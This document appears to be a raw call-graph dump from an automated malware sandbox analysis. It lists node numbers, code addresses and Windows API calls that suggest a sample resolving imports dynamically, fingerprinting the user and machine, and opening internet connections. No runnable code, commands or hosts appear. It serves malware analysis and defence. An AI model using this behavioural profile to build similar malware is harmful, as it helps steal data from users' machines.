LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 76524->76525 76526 4181e8 GetProcAddress 76524->76526 76527 418458 GetProcAddress 76525->76527 76528 41846b 76525->76528 76529 41820b 20 API calls 76526->76529 76527->76528 76530 418474 GetProcAddress GetProcAddress 76528->76530 76531 41849f 76528->76531 76529->76525 76530->76531 76532 4184a8 GetProcAddress 76531->76532 76533 4184bb 76531->76533 76532->76533 76534 4184c4 GetProcAddress 76533->76534 76535 4184d7 76533->76535 76534->76535 76536 4184e0 GetProcAddress GetProcAddress 76535->76536 76537 4180e0 76535->76537 76536->76537 76538 40fcd0 76537->76538 76539 40fce0 76538->76539 76540 40fcff 76539->76540 76541 40fcf7 lstrcpy 76539->76541 76542 4100d0 GetProcessHeap HeapAlloc GetUserNameA 76540->76542 76541->76540 76542->76428 76544 40fedf 76543->76544 76545 40ff07 76544->76545 76546 40fef5 lstrcpy lstrcat 76544->76546 76545->76431 76546->76545 76548 40fdc6 76547->76548 76549 40fdf6 76548->76549 76550 40fdee lstrcpy 76548->76550 76549->76436 76550->76549 76552 417892 76551->76552 76553 40fcd0 lstrcpy 76552->76553 76554 4178a4 76553->76554 76711 40fd60 lstrlenA 76554->76711 76557 40fd60 2 API calls 76558 41791a 76557->76558 76715 402af0 76558->76715 76566 4179f3 76567 40fdb0 lstrcpy 76566->76567 76568 417a08 76567->76568 76569 40fdb0 lstrcpy 76568->76569 76570 417a17 76569->76570 76571 40fdb0 lstrcpy 76570->76571 76572 417a26 76571->76572 76573 40fdb0 lstrcpy 76572->76573 76574 417a65 76573->76574 76575 40fdb0 lstrcpy 76574->76575 76576 417a74 76575->76576 77438 40fd10 76576->77438 76579 40fe90 3 API calls 76580 417aa1 76579->76580 76581 40fdb0 lstrcpy 76580->76581 76582 417ab1 76581->76582 77442 40fe00 76582->77442 76585 40fdb0 lstrcpy 76586 417ae9 76585->76586 76587 417b05 InternetOpenA 76586->76587 77446 40ff70 76587->77446 76589 417b1c InternetOpenA 76590 40fd10 lstrcpy 76589->76590 76591 417b46 76590->76591 77447 402360 76591->77447 76595 417b6a 76596 40fd10 lstrcpy 76595->76596 76597 417b82 76596->76597 77469 404420 76597->77469 76599 417b8c 77606 412650 76599->77606 76601 417b94 76602 40fcd0 lstrcpy 76601->76602 76603 417bc8 76602->76603 76604 401060 lstrcpy 76603->76604 76605 417be0 76604->76605 77625 405bc0 76605->77625 76607 417bea 77805 412000 76607->77805 76609 417bf2 76610 40fcd0 lstrcpy 76609->76610 76611 417c1a 76610->76611 76612 401060 lstrcpy 76611->76612 76613 417c32 76612->76613 76614 405bc0 41 API calls 76613->76614 76615 417c3c 76614->76615 77813 411e50 76615->77813 76617 417c44 76618 401060 lstrcpy 76617->76618 76619 417c58 76618->76619 77824 4154d0 76619->77824 76621 417c5d 76622 40fd10 lstrcpy 76621->76622 76623 417c6e 76622->76623 76624 40fcd0 lstrcpy 76623->76624 76625 417c8b 76624->76625 78170 404b20 76625->78170 76627 417c94 76628 401060 lstrcpy 76627->76628 76629 417cd4 76628->76629 78191 40e800 76629->78191 76708 402316 lstrlenA lstrlenA 76707->76708 76709 4022bd 76707->76709 76708->76447 76710 4022c5 7 API calls 76709->76710 76710->76708 76710->76710 76712 40fd7a 76711->76712 76713 40fda8 76712->76713 76714 40fda0 lstrcpy 76712->76714 76713->76557 76714->76713 76716 402290 10 API calls 76715->76716 76717 402b01 76716->76717 76718 402290 10 API calls 76717->76718 76719 402b17 76718->76719 76720 402290 10 API calls 76719->76720 76721 402b2d 76720->76721 76722 402290 10 API calls 76721->76722 76723 402b43 76722->76723 76724 402290 10 API calls 76723->76724 76725 402b59 76724->76725 76726 402290 10 API calls 76725->76726 76727 402b6f 76726->76727 76728 402290 10 API calls 76727->76728 76729 402b88 76728->76729 76730 402290 10 API calls 76729->76730 76731 402b9e 76730->76731 76732 402290 10 API calls 76731->76732 76733 402bb4 76732->76733 76734 402290 10 API calls 76733->76734 76735 402bca 76734->76735 76736 402290 10 API calls 76735->76736 76737 402be0 76736->76737 76738 402290 10 API calls 76737->76738 76739 402bf6 76738->76739 76740 402290 10 API calls 76739->76740 76741 402c0f 76740->76741 76742 402290 10 API calls 76741->76742 76743 402c25 76742->76743 76744 402290 10 API calls 76743->76744 76745 402c3b 76744->76745 76746 402290 10 API calls 76745->76746 76747 402c51 76746->76747 76748 402290 10 API calls 76747->76748 76749 402c67 76748->76749 76750 402290 10 API calls 76749->76750 76751 402c7d 76750->76751 76752 402290 10 API calls 76751->76752 76753 402c96 76752->76753 76754 402290 10 API calls 76753->76754 76755 402cac 76754->76755 76756 402290 10 API calls 76755->76756 76757 402cc2 76756->76757 76758 402290 10 API calls 76757->76758 76759 402cd8 76758->76759 76760 402290 10 API calls 76759->76760 76761 402cee 76760->76761 76762 402290 10 API calls 76761->76762 76763 402d04 76762->76763 76764 402290 10 API calls 76763->76764 76765 402d1d 76764->76765 76766 402290 10 API calls 76765->76766 76767 402d33 76766->76767 76768 402290 10 API calls 76767->76768 76769 402d49 76768->76769 76770 402290 10 API calls 76769->76770 76771 402d5f 76770->76771 76772 402290 10 API calls 76771->76772 76773 402d75 76772->76773 76774 402290 10 API calls 76773->76774 76775 402d8b 76774->76775 76776 402290 10 API calls 76775->76776 76777 402da4 76776->76777 76778 402290 10 API calls 76777->76778 76779 402dba 76778->76779 76780 402290 10 API calls 76779->76780 76781 402dd0 76780->76781 76782 402290 10 API calls 76781->76782 76783 402de6 76782->76783 76784 402290 10 API calls 76783->76784 76785 402dfc 76784->76785 76786 402290 10 API calls 76785->76786 76787 402e12 76786->76787 76788 402290 10 API calls 76787->76788 76789 402e2b 76788->76789 76790 402290 10 API calls 76789->76790 76791 402e41 76790->76791 76792 402290 10 API calls 76791->76792 76793 402e57 76792->76793 76794 402290 10 API calls 76793->76794 76795 402e6d 76794->76795 76796 402290 10 API calls 76795->76796 76797 402e83 76796->76797 76798 402290 10 API calls 76797->76798 76799 402e99 76798->76799 76800 402290 10 API calls 76799->76800 76801 402eb2 76800->76801 76802 402290 10 API calls 76801->76802 76803 402ec8 76802->76803 76804 402290 10 API calls 76803->76804 76805 402ede 76804->76805 76806 402290 10 API calls 76805->76806 76807 402ef4 76806->76807 76808 402290 10 API calls 76807->76808 76809 402f0a 76808->76809 76810 402290 10 API calls 76809->76810 76811 402f20 76810->76811 76812 402290 10 API calls 76811->76812 76813 402f39 76812->76813 76814 402290 10 API calls 76813->76814 76815 402f4f 76814->76815 76816 402290 10 API calls 76815->76816 76817 402f65 76816->76817 76818 402290 10 API calls 76817->76818 76819 402f7b 76818->76819 76820 402290 10 API calls 76819->76820 76821 402f91 76820->76821 76822 402290 10 API calls 76821->76822 76823 402fa7 76822->76823 76824 402290 10 API calls 76823->76824 76825 402fc0 76824->76825 76826 402290 10 API calls 76825->76826 76827 402fd6 76826->76827 76828 402290 10 API calls 76827->76828 76829 402fec 76828->76829 76830 402290 10 API calls 76829->76830 76831 403002 76830->76831 76832 402290 10 API calls 76831->76832 76833 403018 76832->76833 76834 402290 10 API calls 76833->76834 76835 40302e 76834->76835 76836 402290 10 API calls 76835->76836 76837 403047 76836->76837 76838 402290 10 API calls 76837->76838 76839 40305d 76838->76839 76840 402290 10 API calls 76839->76840 76841 403073 76840->76841 76842 402290 10 API calls 76841->76842 76843 403089 76842->76843 76844 402290 10 API calls 76843->76844 76845 40309f 76844->76845 76846 402290 10 API calls 76845->76846 76847 4030b5 76846->76847 76848 402290 10 API calls 76847->76848 76849 4030ce 76848->76849 76850 402290 10 API calls 76849->76850 76851 4030e4 76850->76851 76852 402290 10 API calls 76851->76852 76853 4030fa 76852->76853 76854 402290 10 API calls 76853->76854 76855 403110 76854->76855 76856 402290 10 API calls 76855->76856 76857 403126 76856->76857 76858 402290 10 API calls 76857->76858 76859 40313c 76858->76859 76860 402290 10 API calls 76859->76860 76861 403155 76860->76861 76862 402290 10 API calls 76861->76862 76863 40316b 76862->76863 76864 402290 10 API calls 76863->76864 76865 403181 76864->76865 76866 402290 10 API calls 76865->76866 76867 403197 76866->76867 76868 402290 10 API calls 76867->76868 76869 4031ad 76868->76869 76870 402290 10 API calls 76869->76870 76871 4031c3 76870->76871 76872 402290 10 API calls 76871->76872 76873 4031dc 76872->76873 76874 402290 10 API calls 76873->76874 76875 4031f2 76874->76875 76876 402290 10 API calls 76875->76876 76877 403208 76876->76877 76878 402290 10 API calls 76877->76878 76879 40321e 76878->76879 76880 402290 10 API calls 76879->76880 76881 403234 76880->76881 76882 402290 10 API calls 76881->76882 76883 40324a 76882->76883 76884 402290 10 API calls 76883->76884 76885 403263 76884->76885 76886 402290 10 API calls 76885->76886 76887 403279 76886->76887 76888 402290 10 API calls 76887->76888 76889 40328f 76888->76889 76890 402290 10 API calls 76889->76890 76891 4032a5 76890->76891 76892 402290 10 API calls 76891->76892 76893 4032bb 76892->76893 76894 402290 10 API calls 76893->76894 76895 4032d1 76894->76895 76896 402290 10 API calls 76895->76896 76897 4032ea 76896->76897 76898 402290 10 API calls 76897->76898 76899 403300 76898->76899 76900 402290 10 API calls 76899->76900 76901 403316 76900->76901 76902 402290 10 API calls 76901->76902 76903 40332c 76902->76903 76904 402290 10 API calls 76903->76904 76905 403342 76904->76905 76906 402290 10 API calls 76905->76906 76907 403358 76906->76907 76908 402290 10 API calls 76907->76908 76909 403371 76908->76909 76910 402290 10 API calls 76909->76910 76911 403387 76910->76911 76912 402290 10 API calls 76911->76912 76913 40339d 76912->76913 76914 402290 10 API calls 76913->76914 76915 4033b3 76914->76915 76916 402290 10 API calls 76915->76916 76917 4033c9 76916->76917 76918 402290 10 API calls 76917->76918 76919 4033df 76918->76919 76920 402290 10 API calls 76919->76920 76921 4033f8 76920->76921 76922 402290 10 API calls 76921->76922 76923 40340e 76922->76923 76924 402290 10 API calls 76923->76924 76925 403424 76924->76925 76926 402290 10 API calls 76925->76926 76927 40343a 76926->76927 76928 402290 10 API calls 76927->76928 76929 403450 76928->76929 76930 402290 10 API calls 76929->76930 76931 403466 76930->76931 76932 402290 10 API calls 76931->76932 76933 40347f 76932->76933 76934 402290 10 API calls 76933->76934 76935 403495 76934->76935 76936 402290 10 API calls 76935->76936 76937 4034ab 76936->76937 76938 402290 10 API calls 76937->76938 76939 4034c1 76938->76939 76940 402290 10 API calls 76939->76940 76941 4034d7 76940->76941 76942 402290 10 API calls 76941->76942 76943 4034ed 76942->76943 76944 402290 10 API calls 76943->76944 76945 403506 76944->76945 76946 402290 10 API calls 76945->76946 76947 40351c 76946->76947 76948 402290 10 API calls 76947->76948 76949 403532 76948->76949 76950 402290 10 API calls 76949->76950 76951 403548 76950->76951 76952 402290 10 API calls 76951->76952 76953 40355e 76952->76953 76954 402290 10 API calls 76953->76954 76955 403574 76954->76955 76956 402290 10 API calls 76955->76956 76957 40358d 76956->76957 76958 402290 10 API calls 76957->76958 76959 4035a3 76958->76959 76960 402290 10 API calls 76959->76960 76961 4035b9 76960->76961 76962 402290 10 API calls 76961->76962 76963 4035cf 76962->76963 76964 402290 10 API calls 76963->76964 76965 4035e5 76964->76965 76966 402290 10 API calls 76965->76966 76967 4035fb 76966->76967 76968 402290 10 API calls 76967->76968 76969 403614 76968->76969 76970 402290 10 API calls 76969->76970 76971 40362a 76970->76971 76972 402290 10 API calls 76971->76972 76973 403640 76972->76973 76974 402290 10 API calls 76973->76974 76975 403656 76974->76975 76976 402290 10 API calls 76975->76976 76977 40366c 76976->76977 76978 402290 10 API calls 76977->76978 76979 403682 76978->76979 76980 402290 10 API calls 76979->76980 76981 40369b 76980->76981 76982 402290 10 API calls 76981->76982 76983 4036b1 76982->76983 76984 402290 10 API calls 76983->76984 76985 4036c7 76984->76985 76986 402290 10 API calls 76985->76986 76987 4036dd 76986->76987 76988 402290 10 API calls 76987->76988 76989 4036f3 76988->76989 76990 402290 10 API calls 76989->76990 76991 403709 76990->76991 76992 402290 10 API calls 76991->76992 76993 403722 76992->76993 76994 402290 10 API calls 76993->76994 76995 403738 76994->76995 76996 402290 10 API calls 76995->76996 76997 40374e 76996->76997 76998 402290 10 API calls 76997->76998 76999 403764 76998->76999 77000 402290 10 API calls 76999->77000 77001 40377a 77000->77001 77002 402290 10 API calls 77001->77002 77003 403790 77002->77003 77004 402290 10 API calls 77003->77004 77005 4037a9 77004->77005 77006 402290 10 API calls 77005->77006 77007 4037bf 77006->77007 77008 402290 10 API calls 77007->77008 77009 4037d5 77008->77009 77010 402290 10 API calls 77009->77010 77011 4037eb 77010->77011 77012 402290 10 API calls 77011->77012 77013 403801 77012->77013 77014 402290 10 API calls 77013->77014 77015 403817 77014->77015 77016 402290 10 API calls 77015->77016 77017 403830 77016->77017 77018 402290 10 API calls 77017->77018 77019 403846 77018->77019 77020 402290 10 API calls 77019->77020 77021 40385c 77020->77021 77022 402290 10 API calls 77021->77022 77023 403872 77022->77023 77024 402290 10 API calls 77023->77024 77025 403888 77024->77025 77026 402290 10 API calls 77025->77026 77027 40389e 77026->77027 77028 402290 10 API calls 77027->77028 77029 4038b7 77028->77029 77030 402290 10 API calls 77029->77030 77031 4038cd 77030->77031 77032 402290 10 API calls 77031->77032 77033 4038e3 77032->77033 77034 402290 10 API calls 77033->77034 77035 4038f9 77034->77035 77036 402290 10 API calls 77035->77036 77037 40390f 77036->77037 77038 402290 10 API calls 77037->77038 77039 403925 77038->77039 77040 402290 10 API calls 77039->77040 77041 40393e 77040->77041 77042 402290 10 API calls 77041->77042 77043 403954 77042->77043 77044 402290 10 API calls 77043->77044 77045 40396a 77044->77045 77046 402290 10 API calls 77045->77046 77047 403980 77046->77047 77048 402290 10 API calls 77047->77048 77049 403996 77048->77049 77050 402290 10 API calls 77049->77050 77051 4039ac 77050->77051 77052 402290 10 API calls 77051->77052 77053 4039c5 77052->77053 77054 402290 10 API calls 77053->77054 77055 4039db 77054->77055 77056 402290 10 API calls 77055->77056 77057 4039f1 77056->77057 77058 402290 10 API calls 77057->77058 77059 403a07 77058->77059 77060 402290 10 API calls 77059->77060 77061 403a1d 77060->77061 77062 402290 10 API calls 77061->77062 77063 403a33 77062->77063 77064 402290 10 API calls 77063->77064 77065 403a4c 77064->77065 77066 402290 10 API calls 77065->77066 77067 403a62 77066->77067 77068 402290 10 API calls 77067->77068 77069 403a78 77068->77069 77070 402290 10 API calls 77069->77070 77071 403a8e 77070->77071 77072 402290 10 API calls 77071->77072 77073 403aa4 77072->77073 77074 402290 10 API calls 77073->77074 77075 403aba 77074->77075 77076 402290 10 API calls 77075->77076 77077 403ad3 77076->77077 77078 402290 10 API calls 77077->77078 77079 403ae9 77078->77079 77080 402290 10 API calls 77079->77080 77081 403aff 77080->77081 77082 402290 10 API calls 77081->77082 77083 403b15 77082->77083 77084 402290 10 API calls 77083->77084 77085 403b2b 77084->77085 77086 402290 10 API calls 77085->77086 77087 403b41 77086->77087 77088 402290 10 API calls 77087->77088 77089 403b5a 77088->77089 77090 402290 10 API calls 77089->77090 77091 403b70 77090->77091 77092 402290 10 API calls 77091->77092 77093 403b86 77092->77093 77094 402290 10 API calls 77093->77094 77095 403b9c 77094->77095 77096 402290 10 API calls 77095->77096 77097 403bb2 77096->77097 77098 402290 10 API calls 77097->77098 77099 403bc8 77098->77099 77100 402290 10 API calls 77099->77100 77101 403be1 77100->77101 77102 402290 10 API calls 77101->77102 77103 403bf7 77102->77103 77104 402290 10 API calls 77103->77104 77105 403c0d 77104->77105 77106 402290 10 API calls 77105->77106 77107 403c23 77106->77107 77108 402290 10 API calls 77107->77108 77109 403c39 77108->77109 77110 402290 10 API calls 77109->77110 77111 403c4f 77110->77111 77112 402290 10 API calls 77111->77112 77113 403c68 77112->77113 77114 402290 10 API calls 77113->77114 77115 403c7e 77114->77115 77116 402290 10 API calls 77115->77116 77117 403c94 77116->77117 77118 402290 10 API calls 77117->77118 77119 403caa 77118->77119 77120 402290 10 API calls 77119->77120 77121 403cc0 77120->77121 77122 402290 10 API calls 77121->77122 77123 403cd6 77122->77123 77124 402290 10 API calls 77123->77124 77125 403cef 77124->77125 77126 402290 10 API calls 77125->77126 77127 403d05 77126->77127 77128 402290 10 API calls 77127->77128 77129 403d1b 77128->77129 77130 402290 10 API calls 77129->77130 77131 403d31 77130->77131 77132 402290 10 API calls 77131->77132 77133 403d47 77132->77133 77134 402290 10 API calls 77133->77134 77135 403d5d 77134->77135 77136 402290 10 API calls 77135->77136 77137 403d76 77136->77137 77138 402290 10 API calls 77137->77138 77139 403d8c 77138->77139 77140 402290 10 API calls 77139->77140 77141 403da2 77140->77141 77142 402290 10 API calls 77141->77142 77143 403db8 77142->77143 77144 402290 10 API calls 77143->77144 77145 403dce 77144->77145 77146 402290 10 API calls 77145->77146 77147 403de4 77146->77147 77148 402290 10 API calls 77147->77148 77149 403dfd 77148->77149 77150 402290 10 API calls 77149->77150 77151 403e13 77150->77151 77152 402290 10 API calls 77151->77152 77153 403e29 77152->77153 77154 402290 10 API calls 77153->77154 77155 403e3f 77154->77155 77156 402290 10 API calls 77155->77156 77157 403e55 77156->77157 77158 402290 10 API calls 77157->77158 77159 403e6b 77158->77159 77160 402290 10 API calls 77159->77160 77161 403e84 77160->77161 77162 402290 10 API calls 77161->77162 77163 403e9a 77162->77163 77164 402290 10 API calls 77163->77164 77165 403eb0 77164->77165 77166 402290 10 API calls 77165->77166 77167 403ec6 77166->77167 77168 402290 10 API calls 77167->77168 77169 403edc 77168->77169 77170 402290 10 API calls 77169->77170 77171 403ef2 77170->77171 77172 402290 10 API calls 77171->77172 77173 403f0b 77172->77173 77174 402290 10 API calls 77173->77174 77175 403f21 77174->77175 77176 402290 10 API calls 77175->77176 77177 403f37 77176->77177 77178 402290 10 API calls 77177->77178 77179 403f4d 77178->77179 77180 402290 10 API calls 77179->77180 77181 403f63 77180->77181 77182 402290 10 API calls 77181->77182 77183 403f79 77182->77183 77184 402290 10 API calls 77183->77184 77185 403f92 77184->77185 77186 402290 10 API calls 77185->77186 77187 403fa8 77186->77187 77188 402290 10 API calls 77187->77188 77189 403fbe 77188->77189 77190 402290 10 API calls 77189->77190 77191 403fd4 77190->77191 77192 402290 10 API calls 77191->77192 77193 403fea 77192->77193 77194 402290 10 API calls 77193->77194 77195 404000 77194->77195 77196 402290 10 API calls 77195->77196 77197 404019 77196->77197 77198 402290 10 API calls 77197->77198 77199 40402f 77198->77199 77200 402290 10 API calls 77199->77200 77201 404045 77200->77201 77202 402290 10 API calls 77201->77202 77203 40405b 77202->77203 77204 402290 10 API calls 77203->77204 77205 404071 77204->77205 77206 402290 10 API calls 77205->77206 77207 404087 77206->77207 77208 402290 10 API calls 77207->77208 77209 4040a0 77208->77209 77210 402290 10 API calls 77209->77210 77211 4040b6 77210->77211 77212 402290 10 API calls 77211->77212 77213 4040cc 77212->77213 77214 402290 10 API calls 77213->77214 77215 4040e2 77214->77215 77216 402290 10 API calls 77215->77216 77217 4040f8 77216->77217 77218 402290 10 API calls 77217->77218 77219 40410e 77218->77219 77220 402290 10 API calls 77219->77220 77221 404127 77220->77221 77222 402290 10 API calls 77221->77222 77223 40413d 77222->77223 77224 402290 10 API calls 77223->77224 77225 404153 77224->77225 77226 402290 10 API calls 77225->77226 77227 404169 77226->77227 77228 402290 10 API calls 77227->77228 77229 40417f 77228->77229 77230 402290 10 API calls 77229->77230 77231 404195 77230->77231 77232 402290 10 API calls 77231->77232 77233 4041ae 77232->77233 77234 402290 10 API calls 77233->77234 77235 4041c4 77234->77235 77236 402290 10 API calls 77235->77236 77237 4041da 77236->77237 77238 402290 10 API calls 77237->77238 77239 4041f0 77238->77239 77240 402290 10 API calls 77239->77240 77241 404206 77240->77241 77242 402290 10 API calls 77241->77242 77243 40421c 77242->77243 77244 402290 10 API calls 77243->77244 77245 404235 77244->77245 77246 402290 10 API calls 77245->77246 77247 40424b 77246->77247 77248 402290 10 API calls 77247->77248 77249 404261 77248->77249 77250 402290 10 API calls 77249->77250 77251 404277 77250->77251 77252 402290 10 API calls 77251->77252 77253 40428d 77252->77253 77254 402290 10 API calls 77253->77254 77255 4042a3 77254->77255 77256 402290 10 API calls 77255->77256 77257 4042bc 77256->77257 77258 402290 10 API calls 77257->77258 77259 4042d2 77258->77259 77260 402290 10 API calls 77259->77260 77261 4042e8 77260->77261 77262 402290 10 API calls 77261->77262 77263 4042fe 77262->77263 77264 402290 10 API calls 77263->77264 77265 404314 77264->77265 77266 402290 10 API calls 77265->77266 77267 40432a 77266->77267 77268 402290 10 API calls 77267->77268 77269 404343 77268->77269 77270 418510 77269->77270 77271 41851d 43 API calls 77270->77271 77272 41892e 9 API calls 77270->77272 77271->77272 77273 4189d4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77272->77273 77274 418a48 77272->77274 77273->77274 77275 418b12 77274->77275 77276 418a55 8 API calls 77274->77276 77277 418b1b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77275->77277 77278 418b8f 77275->77278 77276->77275 77277->77278 77279 418c29 77278->77279 77280 418b9c 6 API calls 77278->77280 77281 418c36 9 API calls 77279->77281 77282 418d0c 77279->77282 77280->77279 77281->77282 77283 418d15 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77282->77283 77284 418d89 77282->77284 77283->77284 77285 418d92 GetProcAddress GetProcAddress 77284->77285 77286 418dbd 77284->77286 77285->77286 77287 418df1 77286->77287 77288 418dc6 GetProcAddress GetProcAddress 77286->77288 77289 418ee9 77287->77289 77290 418dfe 10 API calls 77287->77290 77288->77287 77291 418ef2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77289->77291 77292 418f4e 77289->77292 77290->77289 77291->77292 77293 418f57 GetProcAddress 77292->77293 77294 418f6a 77292->77294 77293->77294 77295 418f73 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77294->77295 77296 418fcf 77294->77296 77295->77296 77297 4179d3 77296->77297 77298 418fd8 GetProcAddress 77296->77298 77299 401060 77297->77299 77298->77297 77300 40fd10 lstrcpy 77299->77300 77301 401089 77300->77301 77302 40fd10 lstrcpy 77301->77302 77303 40109c 77302->77303 77304 40fd10 lstrcpy 77303->77304 77305 4010b8 77304->77305 77306 4141b0 77305->77306 77307 4141e8 77306->77307 77308 40fd60 2 API calls 77307->77308 77309 414211 77308->77309 77310 40fd60 2 API calls 77309->77310 77311 41421e 77310->77311 77312 40fd60 2 API calls 77311->77312 77313 41422b 77312->77313 77314 40fcd0 lstrcpy 77313->77314 77315 414238 77314->77315 77316 40fcd0 lstrcpy 77315->77316 77317 414249 77316->77317 77318 40fcd0 lstrcpy 77317->77318 77319 41425a 77318->77319 77320 40fcd0 lstrcpy 77319->77320 77321 41426e 77320->77321 77322 40fcd0 lstrcpy 77321->77322 77323 41427f 77322->77323 77324 40fcd0 lstrcpy 77323->77324 77437 414293 77324->77437 77325 402390 lstrcpy 77325->77437 77327 413a00 29 API calls 77327->77437 77328 40fd10 lstrcpy 77328->77437 77329 4144ab StrCmpCA 77329->77437 77330 4023f0 lstrcpy 77330->77437 77331 414540 StrCmpCA 77332 41511a 77331->77332 77331->77437 77333 40fdb0 lstrcpy 77332->77333 77334 415126 77333->77334 78418 4023f0 77334->78418 77337 401060 lstrcpy 77337->77437 77338 40fdb0 lstrcpy 77340 41513f 77338->77340 77339 414713 StrCmpCA 77341 41500b 77339->77341 77339->77437 78421 402680 lstrcpy 77340->78421 77342 40fdb0 lstrcpy 77341->77342 77344 415017 77342->77344 77343 402420 lstrcpy 77343->77437 78416 402480 lstrcpy 77344->78416 77348 415153 77351 40fdb0 lstrcpy 77348->77351 77349 415020 77352 40fdb0 lstrcpy 77349->77352 77350 4148ff StrCmpCA 77353 414ef9 77350->77353 77350->77437 77354 415163 77351->77354 77355 415030 77352->77355 77356 40fdb0 lstrcpy 77353->77356 77359 40fd10 lstrcpy 77354->77359 78417 4026b0 lstrcpy 77355->78417 77357 414f08 77356->77357 78414 402510 lstrcpy 77357->78414 77362 41517c 77359->77362 77366 40fd10 lstrcpy 77362->77366 77363 415044 77367 40fdb0 lstrcpy 77363->77367 77364 414f11 77368 40fdb0 lstrcpy 77364->77368 77365 414ad2 StrCmpCA 77370 414de4 77365->77370 77365->77437 77371 41518c 77366->77371 77372 415054 77367->77372 77369 414f21 77368->77369 78415 4026e0 lstrcpy 77369->78415 77373 40fdb0 lstrcpy 77370->77373 77375 40fd10 lstrcpy 77371->77375 77378 40fd10 lstrcpy 77372->77378 77376 414df0 77373->77376 77374 402540 lstrcpy 77374->77437 77436 414d57 77375->77436 78412 4025a0 lstrcpy 77376->78412 77377 41467e StrCmpCA 77377->77437 77382 41506d 77378->77382 77386 40fd10 lstrcpy 77382->77386 77383 414f35 77387 40fdb0 lstrcpy 77383->77387 77384 414df9 77389 40fdb0 lstrcpy 77384->77389 77385 402480 lstrcpy 77385->77437 77391 41507d 77386->77391 77392 414f45 77387->77392 77388 414cb1 StrCmpCA 77393 414ccc 77388->77393 77394 414cbc Sleep 77388->77394 77395 414e09 77389->77395 77390 4024b0 lstrcpy 77390->77437 77398 40fd10 lstrcpy 77391->77398 77402 40fd10 lstrcpy 77392->77402 77397 40fdb0 lstrcpy 77393->77397 77394->77437 78413 402710 lstrcpy 77395->78413 77396 4025a0 lstrcpy 77396->77437 77400 414cdb 77397->77400 77398->77436 77399 41485d StrCmpCA 77399->77437 78410 402630 lstrcpy 77400->78410 77406 414f5e 77402->77406 77405 402510 lstrcpy 77405->77437 77409 40fd10 lstrcpy 77406->77409 77407 414ce4 77410 40fdb0 lstrcpy 77407->77410 77408 414e20 77411 40fdb0 lstrcpy 77408->77411 77412 414f6e 77409->77412 77413 414cf4 77410->77413 77414 414e30 77411->77414 77415 40fd10 lstrcpy 77412->77415 78411 402740 lstrcpy 77413->78411 77418 40fd10 lstrcpy 77414->77418 77415->77436 77416 402630 lstrcpy 77416->77437 77417 414a3d StrCmpCA 77417->77437 77420 414e4c 77418->77420 77422 40fd10 lstrcpy 77420->77422 77421 414d0b 77423 40fdb0 lstrcpy 77421->77423 77425 414e5c 77422->77425 77426 414d1b 77423->77426 77424 4025d0 lstrcpy 77424->77437 77427 40fd10 lstrcpy 77425->77427 77430 40fd10 lstrcpy 77426->77430 77427->77436 77428 414c1c StrCmpCA 77428->77437 77429 4138c0 24 API calls 77429->77437 77431 414d37 77430->77431 77433 40fd10 lstrcpy 77431->77433 77432 40fdb0 lstrcpy 77432->77437 77434 414d47 77433->77434 77435 40fd10 lstrcpy 77434->77435 77435->77436 77436->76566 77437->77325 77437->77327 77437->77328 77437->77329 77437->77330 77437->77331 77437->77337 77437->77339 77437->77343 77437->77350 77437->77365 77437->77374 77437->77377 77437->77385 77437->77388 77437->77390 77437->77396 77437->77399 77437->77405 77437->77416 77437->77417 77437->77424 77437->77428 77437->77429 77437->77432 78403 4023c0 77437->78403 78406 402450 lstrcpy 77437->78406 78407 4024e0 lstrcpy 77437->78407 78408 402570 lstrcpy 77437->78408 78409 402600 lstrcpy 77437->78409 77439 40fd27 77438->77439 77440 40fd3e 77439->77440 77441 40fd36 lstrcpy 77439->77441 77440->76579 77441->77440 77443 40fe4b 77442->77443 77444 40fe75 77443->77444 77445 40fe61 lstrcpy lstrcat 77443->77445 77444->76585 77445->77444 77446->76589 77448 40fcd0 lstrcpy 77447->77448 77449 40237b 77448->77449 77450 410be0 GetWindowsDirectoryA 77449->77450 77451 410c22 77450->77451 77452 410c29 GetVolumeInformationA 77450->77452 77451->77452 77453 410c60 77452->77453 77454 410c96 GetProcessHeap HeapAlloc 77453->77454 77455 410cb0 77454->77455 77456 410ccc wsprintfA lstrcat 77454->77456 77457 40fcd0 lstrcpy 77455->77457 78422 410b80 GetCurrentHwProfileA 77456->78422 77459 410cbb 77457->77459 77459->76595 77460 410cff 77461 410d11 lstrlenA 77460->77461 77462 410d26 77461->77462 78429 411a10 lstrcpy malloc strncpy 77462->78429 77464 410d30 77465 410d3e lstrcat 77464->77465 77466 410d52 77465->77466 77467 40fcd0 lstrcpy 77466->77467 77468 410d65 77467->77468 77468->76595 77470 40fd10 lstrcpy 77469->77470 77471 404460 77470->77471 78430 404350 77471->78430 77473 40446c 77474 40fcd0 lstrcpy 77473->77474 77475 40448d 77474->77475 77476 40fcd0 lstrcpy 77475->77476 77477 4044a1 77476->77477 77478 40fcd0 lstrcpy 77477->77478 77479 4044b2 77478->77479 77480 40fcd0 lstrcpy 77479->77480 77481 4044c3 77480->77481 77482 40fcd0 lstrcpy 77481->77482 77483 4044d4 77482->77483 77484 4044e9 InternetOpenA StrCmpCA 77483->77484 77485 404514 77484->77485 77486 404a88 InternetCloseHandle 77485->77486 78438 411310 77485->78438 77500 404a9a 77486->77500 77488 40452e 77489 40fe00 2 API calls 77488->77489 77490 404542 77489->77490 77491 40fdb0 lstrcpy 77490->77491 77492 40454f 77491->77492 77493 40fe90 3 API calls 77492->77493 77494 404577 77493->77494 77495 40fdb0 lstrcpy 77494->77495 77496 404584 77495->77496 77497 40fe90 3 API calls 77496->77497 77498 4045a0 77497->77498 77499 40fdb0 lstrcpy 77498->77499 77501 4045ad 77499->77501 77500->76599 77502 40fe00 2 API calls 77501->77502 77503 4045c8 77502->77503 77504 40fdb0 lstrcpy 77503->77504 77505 4045d5 77504->77505 77506 40fe90 3 API calls 77505->77506 77507 4045f1 77506->77507 77508 40fdb0 lstrcpy 77507->77508 77509 4045fe 77508->77509 77510 40fe90 3 API calls 77509->77510 77511 40461a 77510->77511 77512 40fdb0 lstrcpy 77511->77512 77513 404627 77512->77513 77514 40fe90 3 API calls 77513->77514 77515 404644 77514->77515 77516 40fe00 2 API calls 77515->77516 77517 404657 77516->77517 77518 40fdb0 lstrcpy 77517->77518 77519 404664 77518->77519 77520 40467b InternetConnectA 